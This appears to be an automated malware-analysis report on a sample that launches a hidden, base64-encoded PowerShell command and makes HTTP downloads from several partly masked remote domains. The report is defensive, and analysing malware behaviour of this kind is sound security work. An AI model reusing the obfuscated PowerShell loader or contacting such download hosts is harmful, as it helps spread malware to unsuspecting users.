Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABVAGgAZAA2AGQAdwBxAD0AKAAnAFQAdgBvACcAKwAnAHQAdAAnACsAJwBnAGgAJwApADsAJgAoACcAbgBlAHcAJwArACcALQAnACsAJwBpAHQAZQBtACcAKQAgACQARQBuAFYAOgB0AEUAbQBwAFwATwBGAGYASQBDAEUAMgAwADEAOQAgAC0AaQB0AG...
Network activity
TCP
HTTP GET requests
- http://kr#####urtransfer.com/WLdPbPn/
- http://kr####gaireland.com/cgi-bin/X5h427139317/
- http://la###ni.com.br/pCG/
UDP
- DNS ASK ha####tanbul.com
- DNS ASK hc###t.com.br
- DNS ASK kr#####urtransfer.com
- DNS ASK kr####gaireland.com
- DNS ASK la###ni.com.br
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABVAGgAZAA2AGQAdwBxAD0AKAAnAFQAdgBvACcAKwAnAHQAdAAnACsAJwBnAGgAJwApADsAJgAoACcAbgBlAHcAJwArACcALQAnACsAJwBpAHQAZQBtACcAKQAgACQARQBuAFYAOgB0AEUAbQBwAFwATwBGAGYASQBDAEUAMgAwADEAOQAgAC0AaQB0AG...' (with hidden window)
